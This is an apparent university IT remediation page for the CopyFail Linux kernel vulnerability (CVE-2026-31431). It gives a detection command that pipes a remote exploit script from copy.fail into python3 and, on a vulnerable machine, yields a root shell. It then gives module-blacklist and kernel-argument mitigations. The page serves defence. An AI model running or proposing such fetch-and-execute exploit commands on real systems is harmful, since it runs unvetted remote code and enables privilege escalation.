Remediation for Linux Security Vulnerability

CopyFail CVE-2026-31431

Important: This is a quickly developing situation. We will update guidance as new information emerges and we can validate any new actions.

This page outlines the remediation steps to address the CopyFail (CVE-2026-31431) vulnerability. This is a tested method of remediation that considers the urgency of the issue. We are still awaiting solutions, patching or remediation from vendors. Please contact the SCS Help Desk if you have any questions or need assistance.

For Ubuntu systems, the vulnerability can be detected by running as a non-privileged user:

curl https://copy.fail/exp | python3 && su
- If vulnerable, you'll be dropped into a root shell (without being prompted for a password).
- If the machine is not vulnerable, you'll be dropped into the user shell of your non-privileged user.
- If the command gives you an error, the machine is most likely vulnerable and you should proceed with the patch.
Until a properly updated kernel has been made available, it can be mitigated by running the following command(s) which will disable the algif module.

For Ubuntu systems:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

For Redhat machines, or a Redhat distro:

grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
Reboot your system:

reboot
More information can be found here: https://copy.fail/#mitigation

Was this page helpful?

Use this box to give us feedback on this webpage and its content. If you need a response, please include your Andrew ID.

Need technical support? Submit a ticket